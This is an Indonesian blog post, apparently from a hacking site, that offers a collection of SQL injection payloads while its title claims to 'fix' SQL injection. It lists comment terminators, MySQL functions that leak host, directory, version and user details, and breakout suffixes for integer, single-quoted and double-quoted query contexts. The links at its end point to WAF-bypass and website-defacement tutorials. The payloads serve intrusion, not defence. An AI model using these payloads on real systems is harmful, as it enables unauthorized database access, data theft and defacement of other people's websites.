Fix Sql Injection Query (Collection)

Kali ini gw mau sharing artikel perihal Fix SQL Injection Query.

Berikut collection querynya sebagai berikut ini,

Comment Name
-- : MySQL Linux Style
--+ : MySQL Windows Style
# : Hash (URL encode while use)
--+- : SQL Comment
; : Null Byte
` : Backtick

Variable/Function Output
@@hostname : Current Hostname
@@tmpdir : Tept Directory
@@datadir : Data Directory
@@version : Version of DB
@@basedir : Base Directory
user() : Current User
database() : Current Database
version() : Version
schema() : current Database
UUID() : System UUID key
current_user() : Current User
current_user : Current User
system_user() : Current Sustem user
session_user() : Session user
@@GLOBAL.have_symlink : Check if Symlink Enabled or Disabled
@@GLOBAL.have_ssl : Check if it have ssl or n

integer based
--
-- -
--+-
)--
)-- -
)--+-
))--
))-- -
))--+-
;
) ;
));
%23
%60
%90
and 1=1
and '1'='1
and (1)=(1
php?id=(1) -- -

string based
'--+-
')-- -
')--+-
'))-- -
'))--+-
';
');
'));
'%23
'%60
'%90
' and 1=1
' and '1'='1
' and (1)=(1
php?id=(1') -- -

string based double quotes
"-- -
"--+-
"%23
")-- -
")--+-
"))--+-
";
") ;
"));
"%60
"%90
" and 1=1
" and '1'='1
" and (1)=(1
php?id=(1") -- -

Sekian dari gw, agar bermanfaat.

Sumber http://maqlo-heker.blogspot.com/

Berbagi :

Anda mungkin menyukai postingan ini :

• 
  Tools Manual Sqli Helper - For Mobile
• 
  Macam-Macam Bypass Waf - Sql Injection
• 
  Cara Deface Sqli Dengan Dios (Dump In One Shot)
• 
  Cara Bypass Sqli 412 Precondition Failed